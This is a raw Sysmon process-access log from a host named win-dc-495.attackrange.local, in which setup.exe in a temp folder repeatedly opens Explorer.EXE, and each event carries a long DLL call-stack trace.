13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000016080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000016077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\A